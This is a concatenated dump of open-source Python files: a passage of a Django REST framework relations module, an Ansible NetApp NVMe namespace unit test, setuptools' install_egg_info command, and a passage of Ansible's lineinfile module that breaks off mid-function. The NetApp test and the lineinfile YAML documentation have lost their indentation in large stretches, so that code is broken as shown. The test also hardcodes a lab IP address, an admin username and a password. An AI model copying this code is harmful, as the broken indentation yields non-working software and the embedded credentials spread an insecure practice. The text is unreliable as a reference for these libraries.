            # To-many relationship
            queryset = None
            if not self.source:
                # Prefer obj.serializable_value for performance reasons
                try:
                    queryset = obj.serializable_value(field_name)
                except AttributeError:
                    pass
            if queryset is None:
                # RelatedManager (reverse relationship)
                source = self.source or field_name
                queryset = obj
                for component in source.split('.'):
                    if queryset is None:
                        return []
                    queryset = get_component(queryset, component)
            # Forward relationship
            if is_simple_callable(getattr(queryset, 'all', None)):
                return [self.to_native(item.pk) for item in queryset.all()]
            else:
                # Also support non-queryset iterables.
                # This allows us to also support plain lists of related items.
                return [self.to_native(item.pk) for item in queryset]
        # To-one relationship
        try:
            # Prefer obj.serializable_value for performance reasons
            pk = obj.serializable_value(self.source or field_name)
        except AttributeError:
            # RelatedObject (reverse relationship)
            try:
                pk = getattr(obj, self.source or field_name).pk
            except (ObjectDoesNotExist, AttributeError):
                return None
        # Forward relationship
        return self.to_native(pk)
### Slug relationships
class SlugRelatedField(RelatedField):
    """
    Relationship represented by a unique slug attribute on the target object.
    """
    read_only = False
    default_error_messages = {
        'does_not_exist': _("Object with %s=%s does not exist."),
        'invalid': _('Invalid value.'),
    }

    def __init__(self, *args, **kwargs):
        # The attribute used for lookup and serialization is mandatory.
        slug_field = kwargs.pop('slug_field', None)
        assert slug_field, 'slug_field is required'
        self.slug_field = slug_field
        super(SlugRelatedField, self).__init__(*args, **kwargs)

    def to_native(self, obj):
        # Serialize the relation as the value of its slug attribute.
        return getattr(obj, self.slug_field)

    def from_native(self, data):
        # Resolve the incoming slug back to a model instance.
        if self.queryset is None:
            raise Exception('Writable related fields must include a `queryset` argument')
        lookup = {self.slug_field: data}
        try:
            return self.queryset.get(**lookup)
        except ObjectDoesNotExist:
            raise ValidationError(self.error_messages['does_not_exist'] %
                                  (self.slug_field, smart_text(data)))
        except (TypeError, ValueError):
            raise ValidationError(self.error_messages['invalid'])
### Hyperlinked relationships
class HyperlinkedRelatedField(RelatedField):
    """
    Represents a relationship using hyperlinking.
    """
    read_only = False
    lookup_field = 'pk'
    default_error_messages = {
        'no_match': _('Invalid hyperlink - No URL match'),
        'incorrect_match': _('Invalid hyperlink - Incorrect URL match'),
        'configuration_error': _('Invalid hyperlink due to configuration error'),
        'does_not_exist': _("Invalid hyperlink - object does not exist."),
        'incorrect_type': _('Incorrect type. Expected url string, received %s.'),
    }
    # These are all pending deprecation
    pk_url_kwarg = 'pk'
    slug_field = 'slug'
    slug_url_kwarg = None  # Defaults to same as `slug_field` unless overridden
    def __init__(self, *args, **kwargs):
        # `view_name` is the only mandatory argument.
        try:
            self.view_name = kwargs.pop('view_name')
        except KeyError:
            raise ValueError("Hyperlinked field requires 'view_name' kwarg")
        self.lookup_field = kwargs.pop('lookup_field', self.lookup_field)
        self.format = kwargs.pop('format', None)
        # These are pending deprecation
        if 'pk_url_kwarg' in kwargs:
            msg = 'pk_url_kwarg is pending deprecation. Use lookup_field instead.'
            warnings.warn(msg, PendingDeprecationWarning, stacklevel=2)
        if 'slug_url_kwarg' in kwargs:
            msg = 'slug_url_kwarg is pending deprecation. Use lookup_field instead.'
            warnings.warn(msg, PendingDeprecationWarning, stacklevel=2)
        if 'slug_field' in kwargs:
            msg = 'slug_field is pending deprecation. Use lookup_field instead.'
            warnings.warn(msg, PendingDeprecationWarning, stacklevel=2)
        self.pk_url_kwarg = kwargs.pop('pk_url_kwarg', self.pk_url_kwarg)
        self.slug_field = kwargs.pop('slug_field', self.slug_field)
        default_slug_kwarg = self.slug_url_kwarg or self.slug_field
        self.slug_url_kwarg = kwargs.pop('slug_url_kwarg', default_slug_kwarg)
        super(HyperlinkedRelatedField, self).__init__(*args, **kwargs)
    def get_url(self, obj, view_name, request, format):
        """
        Given an object, return the URL that hyperlinks to the object.
        May raise a `NoReverseMatch` if the `view_name` and `lookup_field`
        attributes are not configured to correctly match the URL conf.

        Tries, in order: lookup_field, then the deprecated pk_url_kwarg,
        then the deprecated slug kwargs.
        """
        lookup_field = getattr(obj, self.lookup_field)
        kwargs = {self.lookup_field: lookup_field}
        try:
            return reverse(view_name, kwargs=kwargs, request=request, format=format)
        except NoReverseMatch:
            pass
        if self.pk_url_kwarg != 'pk':
            # Only try pk if it has been explicitly set.
            # Otherwise, the default `lookup_field = 'pk'` has us covered.
            pk = obj.pk
            kwargs = {self.pk_url_kwarg: pk}
            try:
                return reverse(view_name, kwargs=kwargs, request=request, format=format)
            except NoReverseMatch:
                pass
        slug = getattr(obj, self.slug_field, None)
        if slug is not None:
            # Only try slug if it corresponds to an attribute on the object.
            kwargs = {self.slug_url_kwarg: slug}
            try:
                ret = reverse(view_name, kwargs=kwargs, request=request, format=format)
                if self.slug_field == 'slug' and self.slug_url_kwarg == 'slug':
                    # If the lookup succeeds using the default slug params,
                    # then `slug_field` is being used implicitly, and we
                    # need to warn about the pending deprecation.
                    # NOTE(review): the warning text below is missing a space
                    # between 'deprecation.' and 'You' — confirm before fixing,
                    # since it is a runtime string.
                    msg = 'Implicit slug field hyperlinked fields are pending deprecation.' \
                          'You should set `lookup_field=slug` on the HyperlinkedRelatedField.'
                    warnings.warn(msg, PendingDeprecationWarning, stacklevel=2)
                return ret
            except NoReverseMatch:
                pass
        raise NoReverseMatch()
    def get_object(self, queryset, view_name, view_args, view_kwargs):
        """
        Return the object corresponding to a matched URL.
        Takes the matched URL conf arguments, and the queryset, and should
        return an object instance, or raise an `ObjectDoesNotExist` exception.
        """
        lookup = view_kwargs.get(self.lookup_field, None)
        pk = view_kwargs.get(self.pk_url_kwarg, None)
        slug = view_kwargs.get(self.slug_url_kwarg, None)
        if lookup is not None:
            filter_kwargs = {self.lookup_field: lookup}
        elif pk is not None:
            filter_kwargs = {'pk': pk}
        elif slug is not None:
            filter_kwargs = {self.slug_field: slug}
        else:
            raise ObjectDoesNotExist()
        return queryset.get(**filter_kwargs)
    def to_native(self, obj):
        # Serialize the relation as an absolute (or request-relative) URL.
        view_name = self.view_name
        request = self.context.get('request', None)
        format = self.format or self.context.get('format', None)
        if request is None:
            msg = (
                "Using `HyperlinkedRelatedField` without including the request "
                "in the serializer context is deprecated. "
                "Add `context={'request': request}` when instantiating "
                "the serializer."
            )
            warnings.warn(msg, DeprecationWarning, stacklevel=4)
        # If the object has not yet been saved then we cannot hyperlink to it.
        if getattr(obj, 'pk', None) is None:
            return
        # Return the hyperlink, or error if incorrectly configured.
        try:
            return self.get_url(obj, view_name, request, format)
        except NoReverseMatch:
            msg = (
                'Could not resolve URL for hyperlinked relationship using '
                'view name "%s". You may have failed to include the related '
                'model in your API, or incorrectly configured the '
                '`lookup_field` attribute on this field.'
            )
            raise Exception(msg % view_name)
    def from_native(self, value):
        # Convert URL -> model instance pk
        # TODO: Use values_list
        queryset = self.queryset
        if queryset is None:
            raise Exception('Writable related fields must include a `queryset` argument')
        try:
            http_prefix = value.startswith(('http:', 'https:'))
        except AttributeError:
            msg = self.error_messages['incorrect_type']
            raise ValidationError(msg % type(value).__name__)
        if http_prefix:
            # If needed convert absolute URLs to relative path
            value = urlparse.urlparse(value).path
            prefix = get_script_prefix()
            if value.startswith(prefix):
                value = '/' + value[len(prefix):]
        try:
            match = resolve(value)
        except Exception:
            raise ValidationError(self.error_messages['no_match'])
        if match.view_name != self.view_name:
            raise ValidationError(self.error_messages['incorrect_match'])
        try:
            return self.get_object(queryset, match.view_name,
                                   match.args, match.kwargs)
        except (ObjectDoesNotExist, TypeError, ValueError):
            raise ValidationError(self.error_messages['does_not_exist'])
class HyperlinkedIdentityField(Field):
    """
    Represents the instance, or a property on the instance, using hyperlinking.
    """
    lookup_field = 'pk'
    read_only = True
    # These are all pending deprecation
    pk_url_kwarg = 'pk'
    slug_field = 'slug'
    slug_url_kwarg = None  # Defaults to same as `slug_field` unless overridden
    def __init__(self, *args, **kwargs):
        # `view_name` is the only mandatory argument.
        try:
            self.view_name = kwargs.pop('view_name')
        except KeyError:
            msg = "HyperlinkedIdentityField requires 'view_name' argument"
            raise ValueError(msg)
        self.format = kwargs.pop('format', None)
        lookup_field = kwargs.pop('lookup_field', None)
        self.lookup_field = lookup_field or self.lookup_field
        # These are pending deprecation
        if 'pk_url_kwarg' in kwargs:
            msg = 'pk_url_kwarg is pending deprecation. Use lookup_field instead.'
            warnings.warn(msg, PendingDeprecationWarning, stacklevel=2)
        if 'slug_url_kwarg' in kwargs:
            msg = 'slug_url_kwarg is pending deprecation. Use lookup_field instead.'
            warnings.warn(msg, PendingDeprecationWarning, stacklevel=2)
        if 'slug_field' in kwargs:
            msg = 'slug_field is pending deprecation. Use lookup_field instead.'
            warnings.warn(msg, PendingDeprecationWarning, stacklevel=2)
        self.slug_field = kwargs.pop('slug_field', self.slug_field)
        default_slug_kwarg = self.slug_url_kwarg or self.slug_field
        self.pk_url_kwarg = kwargs.pop('pk_url_kwarg', self.pk_url_kwarg)
        self.slug_url_kwarg = kwargs.pop('slug_url_kwarg', default_slug_kwarg)
        super(HyperlinkedIdentityField, self).__init__(*args, **kwargs)
    def field_to_native(self, obj, field_name):
        # Serialize as the URL of `obj` itself (identity, not a relation).
        request = self.context.get('request', None)
        format = self.context.get('format', None)
        view_name = self.view_name
        if request is None:
            warnings.warn("Using `HyperlinkedIdentityField` without including the "
                          "request in the serializer context is deprecated. "
                          "Add `context={'request': request}` when instantiating the serializer.",
                          DeprecationWarning, stacklevel=4)
        # By default use whatever format is given for the current context
        # unless the target is a different type to the source.
        #
        # Eg. Consider a HyperlinkedIdentityField pointing from a json
        # representation to an html property of that representation...
        #
        # '/snippets/1/' should link to '/snippets/1/highlight/'
        # ...but...
        # '/snippets/1/.json' should link to '/snippets/1/highlight/.html'
        if format and self.format and self.format != format:
            format = self.format
        # Return the hyperlink, or error if incorrectly configured.
        try:
            return self.get_url(obj, view_name, request, format)
        except NoReverseMatch:
            msg = (
                'Could not resolve URL for hyperlinked relationship using '
                'view name "%s". You may have failed to include the related '
                'model in your API, or incorrectly configured the '
                '`lookup_field` attribute on this field.'
            )
            raise Exception(msg % view_name)
    def get_url(self, obj, view_name, request, format):
        """
        Given an object, return the URL that hyperlinks to the object.
        May raise a `NoReverseMatch` if the `view_name` and `lookup_field`
        attributes are not configured to correctly match the URL conf.
        """
        lookup_field = getattr(obj, self.lookup_field, None)
        kwargs = {self.lookup_field: lookup_field}
        # Handle unsaved object case
        if lookup_field is None:
            return None
        try:
            return reverse(view_name, kwargs=kwargs, request=request, format=format)
        except NoReverseMatch:
            pass
        if self.pk_url_kwarg != 'pk':
            # Only try pk lookup if it has been explicitly set.
            # Otherwise, the default `lookup_field = 'pk'` has us covered.
            kwargs = {self.pk_url_kwarg: obj.pk}
            try:
                return reverse(view_name, kwargs=kwargs, request=request, format=format)
            except NoReverseMatch:
                pass
        slug = getattr(obj, self.slug_field, None)
        # NOTE(review): this tests truthiness (`if slug:`) while
        # HyperlinkedRelatedField.get_url tests `is not None`, so an
        # empty-string slug is skipped here — confirm whether intended.
        if slug:
            # Only use slug lookup if a slug field exists on the model
            kwargs = {self.slug_url_kwarg: slug}
            try:
                return reverse(view_name, kwargs=kwargs, request=request, format=format)
            except NoReverseMatch:
                pass
        raise NoReverseMatch()
### Old-style many classes for backwards compat
class ManyRelatedField(RelatedField):
    """Deprecated alias for `RelatedField(many=True)`."""

    def __init__(self, *args, **kwargs):
        # Emit the deprecation notice, then delegate with `many` forced on.
        message = ('`ManyRelatedField()` is deprecated. '
                   'Use `RelatedField(many=True)` instead.')
        warnings.warn(message, DeprecationWarning, stacklevel=2)
        kwargs['many'] = True
        super(ManyRelatedField, self).__init__(*args, **kwargs)
class ManyPrimaryKeyRelatedField(PrimaryKeyRelatedField):
    """Deprecated alias for `PrimaryKeyRelatedField(many=True)`."""

    def __init__(self, *args, **kwargs):
        # Emit the deprecation notice, then delegate with `many` forced on.
        message = ('`ManyPrimaryKeyRelatedField()` is deprecated. '
                   'Use `PrimaryKeyRelatedField(many=True)` instead.')
        warnings.warn(message, DeprecationWarning, stacklevel=2)
        kwargs['many'] = True
        super(ManyPrimaryKeyRelatedField, self).__init__(*args, **kwargs)
class ManySlugRelatedField(SlugRelatedField):
    """Deprecated alias for `SlugRelatedField(many=True)`."""

    def __init__(self, *args, **kwargs):
        # Emit the deprecation notice, then delegate with `many` forced on.
        message = ('`ManySlugRelatedField()` is deprecated. '
                   'Use `SlugRelatedField(many=True)` instead.')
        warnings.warn(message, DeprecationWarning, stacklevel=2)
        kwargs['many'] = True
        super(ManySlugRelatedField, self).__init__(*args, **kwargs)
class ManyHyperlinkedRelatedField(HyperlinkedRelatedField):
    """Deprecated alias for `HyperlinkedRelatedField(many=True)`."""

    def __init__(self, *args, **kwargs):
        # Emit the deprecation notice, then delegate with `many` forced on.
        message = ('`ManyHyperlinkedRelatedField()` is deprecated. '
                   'Use `HyperlinkedRelatedField(many=True)` instead.')
        warnings.warn(message, DeprecationWarning, stacklevel=2)
        kwargs['many'] = True
        super(ManyHyperlinkedRelatedField, self).__init__(*args, **kwargs)
| apache-2.0 |
andmos/ansible | test/units/modules/storage/netapp/test_na_ontap_nvme_namespace.py | 48 | 7361 | # (c) 2018, NetApp, Inc
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
''' unit tests ONTAP Ansible module: na_ontap_nvme_namespace'''
from __future__ import print_function
import json
import pytest
from units.compat import unittest
from units.compat.mock import patch
from ansible.module_utils import basic
from ansible.module_utils._text import to_bytes
import ansible.module_utils.netapp as netapp_utils
from ansible.modules.storage.netapp.na_ontap_nvme_namespace \
import NetAppONTAPNVMENamespace as my_module
# Skip every test in this module when the NetApp SDK (netapp_lib) is not
# installed, since the module under test requires it.
if not netapp_utils.has_netapp_lib():
    pytestmark = pytest.mark.skip('skipping as missing required netapp_lib')
def set_module_args(args):
    """prepare arguments so that they will be picked up during module creation"""
    serialized = json.dumps({'ANSIBLE_MODULE_ARGS': args})
    basic._ANSIBLE_ARGS = to_bytes(serialized)  # pylint: disable=protected-access
class AnsibleExitJson(Exception):
    """Raised in place of module.exit_json so tests can capture its payload."""
class AnsibleFailJson(Exception):
    """Raised in place of module.fail_json so tests can capture its payload."""
def exit_json(*args, **kwargs):  # pylint: disable=unused-argument
    """function to patch over exit_json; package return data into an exception"""
    kwargs.setdefault('changed', False)
    raise AnsibleExitJson(kwargs)
def fail_json(*args, **kwargs):  # pylint: disable=unused-argument
    """function to patch over fail_json; package return data into an exception"""
    kwargs.update(failed=True)
    raise AnsibleFailJson(kwargs)
class MockONTAPConnection(object):
    """Stand-in for a ZAPI connection to an ONTAP host."""

    def __init__(self, kind=None):
        """Remember which canned behaviour this fake connection should use."""
        self.type = kind
        self.xml_in = None
        self.xml_out = None

    def invoke_successfully(self, xml, enable_tunneling):  # pylint: disable=unused-argument
        """Record the request and return canned XML for the configured kind."""
        self.xml_in = xml
        response = xml
        if self.type == 'namespace':
            response = self.build_namespace_info()
        elif self.type == 'quota_fail':
            raise netapp_utils.zapi.NaApiError(code='TEST', message="This exception is from the unit test")
        self.xml_out = response
        return response

    @staticmethod
    def build_namespace_info():
        """Build canned XML describing two NVMe namespaces."""
        namespaces = [{'nvme-namespace-info': {'path': 'abcd/vol'}},
                      {'nvme-namespace-info': {'path': 'xyz/vol'}}]
        info = netapp_utils.zapi.NaElement('xml')
        info.translate_struct({'num-records': 2,
                               'attributes-list': namespaces})
        return info
class TestMyModule(unittest.TestCase):
''' a group of related Unit Tests '''
    def setUp(self):
        # Replace AnsibleModule's exit/fail handlers with the exception-raising
        # stand-ins defined above so each test can assert on the outcome.
        self.mock_module_helper = patch.multiple(basic.AnsibleModule,
                                                 exit_json=exit_json,
                                                 fail_json=fail_json)
        self.mock_module_helper.start()
        self.addCleanup(self.mock_module_helper.stop)
        # Default to the mocked ZAPI connection; flip onbox to True to run
        # against a live ONTAP device instead.
        self.server = MockONTAPConnection()
        self.onbox = False
def set_default_args(self):
if self.onbox:
hostname = '10.193.75.3'
username = 'admin'
password = 'netapp1!'
vserver = 'ansible'
ostype = 'linux'
path = 'abcd/vol'
size = 20
else:
hostname = 'hostname'
username = 'username'
password = 'password'
vserver = 'vserver'
ostype = 'linux'
path = 'abcd/vol'
size = 20
return dict({
'hostname': hostname,
'username': username,
'password': password,
'ostype': ostype,
'vserver': vserver,
'path': path,
'size': size
})
def test_module_fail_when_required_args_missing(self):
''' required arguments are reported as errors '''
with pytest.raises(AnsibleFailJson) as exc:
set_module_args({})
my_module()
print('Info: %s' % exc.value.args[0]['msg'])
def test_ensure_get_called(self):
''' test get_namespace() for non-existent namespace'''
set_module_args(self.set_default_args())
my_obj = my_module()
my_obj.server = self.server
assert my_obj.get_namespace() is None
def test_ensure_get_called_existing(self):
''' test get_namespace() for existing namespace'''
set_module_args(self.set_default_args())
my_obj = my_module()
my_obj.server = MockONTAPConnection(kind='namespace')
assert my_obj.get_namespace()
@patch('ansible.modules.storage.netapp.na_ontap_nvme_namespace.NetAppONTAPNVMENamespace.create_namespace')
def test_successful_create(self, create_namespace):
''' creating namespace and testing idempotency '''
set_module_args(self.set_default_args())
my_obj = my_module()
if not self.onbox:
my_obj.server = self.server
with pytest.raises(AnsibleExitJson) as exc:
my_obj.apply()
assert exc.value.args[0]['changed']
create_namespace.assert_called_with()
# to reset na_helper from remembering the previous 'changed' value
my_obj = my_module()
if not self.onbox:
my_obj.server = MockONTAPConnection('namespace')
with pytest.raises(AnsibleExitJson) as exc:
my_obj.apply()
assert not exc.value.args[0]['changed']
@patch('ansible.modules.storage.netapp.na_ontap_nvme_namespace.NetAppONTAPNVMENamespace.delete_namespace')
def test_successful_delete(self, delete_namespace):
''' deleting namespace and testing idempotency '''
data = self.set_default_args()
data['state'] = 'absent'
set_module_args(data)
my_obj = my_module()
if not self.onbox:
my_obj.server = MockONTAPConnection('namespace')
with pytest.raises(AnsibleExitJson) as exc:
my_obj.apply()
assert exc.value.args[0]['changed']
delete_namespace.assert_called_with()
# to reset na_helper from remembering the previous 'changed' value
my_obj = my_module()
if not self.onbox:
my_obj.server = self.server
with pytest.raises(AnsibleExitJson) as exc:
my_obj.apply()
assert not exc.value.args[0]['changed']
def test_if_all_methods_catch_exception(self):
module_args = {}
module_args.update(self.set_default_args())
set_module_args(module_args)
my_obj = my_module()
if not self.onbox:
my_obj.server = MockONTAPConnection('quota_fail')
with pytest.raises(AnsibleFailJson) as exc:
my_obj.get_namespace()
assert 'Error fetching namespace info:' in exc.value.args[0]['msg']
with pytest.raises(AnsibleFailJson) as exc:
my_obj.create_namespace()
assert 'Error creating namespace for path' in exc.value.args[0]['msg']
with pytest.raises(AnsibleFailJson) as exc:
my_obj.delete_namespace()
assert 'Error deleting namespace for path' in exc.value.args[0]['msg']
| gpl-3.0 |
NoahFlowa/glowing-spoon | venv/lib/python2.7/site-packages/setuptools/command/install_egg_info.py | 412 | 2203 | from distutils import log, dir_util
import os
from setuptools import Command
from setuptools import namespaces
from setuptools.archive_util import unpack_archive
import pkg_resources
class install_egg_info(namespaces.Installer, Command):
    """Install an .egg-info directory for the package"""
    description = "Install an .egg-info directory for the package"
    user_options = [
        ('install-dir=', 'd', "directory to install to"),
    ]
    def initialize_options(self):
        # Filled in by finalize_options() from the 'install_lib' command.
        self.install_dir = None
    def finalize_options(self):
        # Mirror install_lib's destination directory.
        self.set_undefined_options('install_lib',
                                   ('install_dir', 'install_dir'))
        ei_cmd = self.get_finalized_command("egg_info")
        # Destination name follows the egg naming convention:
        # '<name>-<version>[...]'.egg-info inside install_dir.
        basename = pkg_resources.Distribution(
            None, None, ei_cmd.egg_name, ei_cmd.egg_version
        ).egg_name() + '.egg-info'
        self.source = ei_cmd.egg_info
        self.target = os.path.join(self.install_dir, basename)
        # Collected by copytree() for get_outputs().
        self.outputs = []
    def run(self):
        self.run_command('egg_info')
        # Remove any stale .egg-info at the destination (but never follow a
        # symlink into someone else's tree) before copying the fresh one.
        if os.path.isdir(self.target) and not os.path.islink(self.target):
            dir_util.remove_tree(self.target, dry_run=self.dry_run)
        elif os.path.exists(self.target):
            self.execute(os.unlink, (self.target,), "Removing " + self.target)
        if not self.dry_run:
            pkg_resources.ensure_directory(self.target)
        self.execute(
            self.copytree, (), "Copying %s to %s" % (self.source, self.target)
        )
        self.install_namespaces()
    def get_outputs(self):
        # Files written by run(), for distutils record keeping.
        return self.outputs
    def copytree(self):
        # Copy the .egg-info tree to site-packages
        def skimmer(src, dst):
            # filter out source-control directories; note that 'src' is always
            # a '/'-separated path, regardless of platform. 'dst' is a
            # platform-specific path.
            for skip in '.svn/', 'CVS/':
                if src.startswith(skip) or '/' + skip in src:
                    return None
            self.outputs.append(dst)
            log.debug("Copying %s to %s", src, dst)
            return dst
        unpack_archive(self.source, self.target, skimmer)
| apache-2.0 |
GheRivero/ansible | lib/ansible/modules/files/lineinfile.py | 4 | 17964 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2012, Daniel Hokka Zakrisson <daniel@hozac.com>
# Copyright: (c) 2014, Ahti Kitsik <ak@ahtik.com>
# Copyright: (c) 2017, Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'core'}
DOCUMENTATION = """
---
module: lineinfile
author:
- Daniel Hokka Zakrissoni (@dhozac)
- Ahti Kitsik (@ahtik)
extends_documentation_fragment:
- files
- validate
short_description: Manage lines in text files
description:
- This module ensures a particular line is in a file, or replace an
existing line using a back-referenced regular expression.
- This is primarily useful when you want to change a single line in
a file only. See the M(replace) module if you want to change
multiple, similar lines or check M(blockinfile) if you want to insert/update/remove a block of lines in a file.
For other cases, see the M(copy) or M(template) modules.
version_added: "0.7"
options:
path:
description:
- The file to modify.
- Before 2.3 this option was only usable as I(dest), I(destfile) and I(name).
aliases: [ dest, destfile, name ]
required: true
regexp:
description:
- The regular expression to look for in every line of the file. For
C(state=present), the pattern to replace if found. Only the last line
found will be replaced. For C(state=absent), the pattern of the line(s)
to remove. Uses Python regular expressions.
See U(http://docs.python.org/2/library/re.html).
version_added: '1.7'
state:
description:
- Whether the line should be there or not.
choices: [ absent, present ]
default: present
line:
description:
- Required for C(state=present). The line to insert/replace into the
file. If C(backrefs) is set, may contain backreferences that will get
expanded with the C(regexp) capture groups if the regexp matches.
backrefs:
description:
- Used with C(state=present). If set, C(line) can contain backreferences
(both positional and named) that will get populated if the C(regexp)
matches. This flag changes the operation of the module slightly;
C(insertbefore) and C(insertafter) will be ignored, and if the C(regexp)
doesn't match anywhere in the file, the file will be left unchanged.
If the C(regexp) does match, the last matching line will be replaced by
the expanded line parameter.
type: bool
default: 'no'
version_added: "1.1"
insertafter:
description:
- Used with C(state=present). If specified, the line will be inserted
after the last match of specified regular expression.
If the first match is required, use(firstmatch=yes).
A special value is available; C(EOF) for inserting the line at the
end of the file.
If specified regular expression has no matches, EOF will be used instead.
May not be used with C(backrefs).
choices: [ EOF, '*regex*' ]
default: EOF
insertbefore:
description:
- Used with C(state=present). If specified, the line will be inserted
before the last match of specified regular expression.
If the first match is required, use(firstmatch=yes).
A value is available; C(BOF) for inserting the line at
the beginning of the file.
If specified regular expression has no matches, the line will be
inserted at the end of the file. May not be used with C(backrefs).
choices: [ BOF, '*regex*' ]
version_added: "1.1"
create:
description:
- Used with C(state=present). If specified, the file will be created
if it does not already exist. By default it will fail if the file
is missing.
type: bool
default: 'no'
backup:
description:
- Create a backup file including the timestamp information so you can
get the original file back if you somehow clobbered it incorrectly.
type: bool
default: 'no'
firstmatch:
description:
      - Used with C(insertafter) or C(insertbefore). If set, C(insertafter) and C(insertbefore)
        will work with the first line that matches the given regular expression.
type: bool
default: 'no'
version_added: "2.5"
others:
description:
- All arguments accepted by the M(file) module also work here.
notes:
- As of Ansible 2.3, the I(dest) option has been changed to I(path) as default, but I(dest) still works as well.
"""
EXAMPLES = r"""
# Before 2.3, option 'dest', 'destfile' or 'name' was used instead of 'path'
- lineinfile:
path: /etc/selinux/config
regexp: '^SELINUX='
line: 'SELINUX=enforcing'
- lineinfile:
path: /etc/sudoers
state: absent
regexp: '^%wheel'
- lineinfile:
path: /etc/hosts
regexp: '^127\.0\.0\.1'
line: '127.0.0.1 localhost'
owner: root
group: root
mode: 0644
- lineinfile:
path: /etc/httpd/conf/httpd.conf
regexp: '^Listen '
insertafter: '^#Listen '
line: 'Listen 8080'
- lineinfile:
path: /etc/services
regexp: '^# port for http'
insertbefore: '^www.*80/tcp'
line: '# port for http by default'
# Add a line to a file if the file does not exist, without passing regexp
- lineinfile:
path: /tmp/testfile
line: '192.168.1.99 foo.lab.net foo'
create: yes
# Fully quoted because of the ': ' on the line. See the Gotchas in the YAML docs.
- lineinfile:
path: /etc/sudoers
state: present
regexp: '^%wheel\s'
line: '%wheel ALL=(ALL) NOPASSWD: ALL'
# Yaml requires escaping backslashes in double quotes but not in single quotes
- lineinfile:
path: /opt/jboss-as/bin/standalone.conf
regexp: '^(.*)Xms(\\d+)m(.*)$'
line: '\1Xms${xms}m\3'
backrefs: yes
# Validate the sudoers file before saving
- lineinfile:
path: /etc/sudoers
state: present
regexp: '^%ADMIN ALL='
line: '%ADMIN ALL=(ALL) NOPASSWD: ALL'
validate: '/usr/sbin/visudo -cf %s'
"""
import os
import re
import tempfile
# import module snippets
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.six import b
from ansible.module_utils._text import to_bytes, to_native
def write_changes(module, b_lines, dest):
    """Write *b_lines* to a temp file, optionally validate it, then atomically
    move it onto *dest*."""
    tmpfd, tmpfile = tempfile.mkstemp()
    tmp = os.fdopen(tmpfd, 'wb')
    tmp.writelines(b_lines)
    tmp.close()

    validate = module.params.get('validate', None)
    if validate:
        # The validate command must reference the candidate file via %s.
        if "%s" not in validate:
            module.fail_json(msg="validate must contain %%s: %s" % (validate))
        rc, out, err = module.run_command(to_bytes(validate % tmpfile, errors='surrogate_or_strict'))
        if rc != 0:
            module.fail_json(msg='failed to validate: '
                                 'rc:%s error:%s' % (rc, err))
        valid = rc == 0
    else:
        # No validator configured: the new content is accepted as-is.
        valid = True
    if valid:
        module.atomic_move(tmpfile,
                           to_native(os.path.realpath(to_bytes(dest, errors='surrogate_or_strict')), errors='surrogate_or_strict'),
                           unsafe_writes=module.params['unsafe_writes'])
def check_file_attrs(module, changed, message, diff):
    """Apply the file-attribute arguments (owner/mode/SELinux...) and fold the
    outcome into the (message, changed) pair being reported."""
    file_args = module.load_file_common_arguments(module.params)
    attrs_changed = module.set_fs_attributes_if_different(file_args, False, diff=diff)
    if attrs_changed:
        # Join with the content-change message when there already is one.
        prefix = " and " if changed else ""
        message = message + prefix + "ownership, perms or SE linux context changed"
        changed = True
    return message, changed
def present(module, dest, regexp, line, insertafter, insertbefore, create,
            backup, backrefs, firstmatch):
    """Ensure ``line`` is present in ``dest``.

    Honours ``regexp`` replacement, ``insertafter``/``insertbefore``
    placement, ``backrefs`` expansion and ``firstmatch`` selection, then
    exits the module reporting whether the file changed.
    """
    diff = {'before': '',
            'after': '',
            'before_header': '%s (content)' % dest,
            'after_header': '%s (content)' % dest}
    b_dest = to_bytes(dest, errors='surrogate_or_strict')
    if not os.path.exists(b_dest):
        if not create:
            module.fail_json(rc=257, msg='Destination %s does not exist !' % dest)
        b_destpath = os.path.dirname(b_dest)
        if not os.path.exists(b_destpath) and not module.check_mode:
            try:
                os.makedirs(b_destpath)
            except Exception as e:
                # NOTE(review): e[0]/e[1] indexing only works on Python 2
                # exceptions; on Python 3 this line itself raises — confirm
                # supported interpreter versions.
                module.fail_json(msg='Error creating %s Error code: %s Error description: %s' % (b_destpath, e[0], e[1]))
        b_lines = []
    else:
        f = open(b_dest, 'rb')
        b_lines = f.readlines()
        f.close()
    if module._diff:
        diff['before'] = to_native(b('').join(b_lines))
    if regexp is not None:
        bre_m = re.compile(to_bytes(regexp, errors='surrogate_or_strict'))
    # Compile the insertion-point pattern only when it is a real regexp, not
    # one of the sentinel values (BOF/EOF/None).
    if insertafter not in (None, 'BOF', 'EOF'):
        bre_ins = re.compile(to_bytes(insertafter, errors='surrogate_or_strict'))
    elif insertbefore not in (None, 'BOF'):
        bre_ins = re.compile(to_bytes(insertbefore, errors='surrogate_or_strict'))
    else:
        bre_ins = None
    # index[0] is the line num where regexp has been found
    # index[1] is the line num where insertafter/inserbefore has been found
    index = [-1, -1]
    m = None
    b_line = to_bytes(line, errors='surrogate_or_strict')
    # Single pass over the file: remember the LAST regexp match and the
    # insertion point (first one only when firstmatch is set).
    for lineno, b_cur_line in enumerate(b_lines):
        if regexp is not None:
            match_found = bre_m.search(b_cur_line)
        else:
            # Without a regexp, match on the exact line, ignoring EOL chars.
            match_found = b_line == b_cur_line.rstrip(b('\r\n'))
        if match_found:
            index[0] = lineno
            m = match_found
        elif bre_ins is not None and bre_ins.search(b_cur_line):
            if insertafter:
                # + 1 for the next line
                index[1] = lineno + 1
                if firstmatch:
                    break
            if insertbefore:
                # index[1] for the previous line
                index[1] = lineno
                if firstmatch:
                    break
    msg = ''
    changed = False
    # Regexp matched a line in the file
    b_linesep = to_bytes(os.linesep, errors='surrogate_or_strict')
    if index[0] != -1:
        if backrefs:
            b_new_line = m.expand(b_line)
        else:
            # Don't do backref expansion if not asked.
            b_new_line = b_line
        if not b_new_line.endswith(b_linesep):
            b_new_line += b_linesep
        # If a regexp is specified and a match is found anywhere in the file, do
        # not insert the line before or after.
        if regexp is None and m:
            # Insert lines
            if insertafter and insertafter != 'EOF':
                # Ensure there is a line separator after the found string
                # at the end of the file.
                if b_lines and not b_lines[-1][-1:] in (b('\n'), b('\r')):
                    b_lines[-1] = b_lines[-1] + b_linesep
                # If the line to insert after is at the end of the file
                # use the appropriate index value.
